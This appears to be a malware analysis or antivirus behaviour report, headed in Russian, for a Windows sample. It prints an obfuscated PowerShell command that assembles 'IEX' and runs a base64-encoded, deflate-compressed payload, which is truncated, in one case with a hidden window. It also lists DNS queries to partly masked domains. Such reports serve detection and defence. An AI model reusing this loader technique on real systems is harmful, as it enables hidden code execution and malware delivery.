Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $pShomE[21]+$pSHOME[30]+'X') ( NEW-obJeCt SYsteM.io.STReamreAdeR((NEW-obJeCt IO.cOmpressiOn.dEfLatestREam( [sySTeM.IO.MEmoryStReam][CoNVErT]::fROmBAsE64StRiNG('VY9RS8MwFIX/Sh4KWalNVHxxoTC...
- DNS ASK wi###ete.com
- DNS ASK al##mums.ru
- DNS ASK st####ctory-era.ru
- DNS ASK ai#.org.pe
- DNS ASK c9###talk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $pShomE[21]+$pSHOME[30]+'X') ( NEW-obJeCt SYsteM.io.STReamreAdeR((NEW-obJeCt IO.cOmpressiOn.dEfLatestREam( [sySTeM.IO.MEmoryStReam][CoNVErT]::fROmBAsE64StRiNG('VY9RS8MwFIX/Sh4KWalNVHxxoTC...' (со скрытым окном)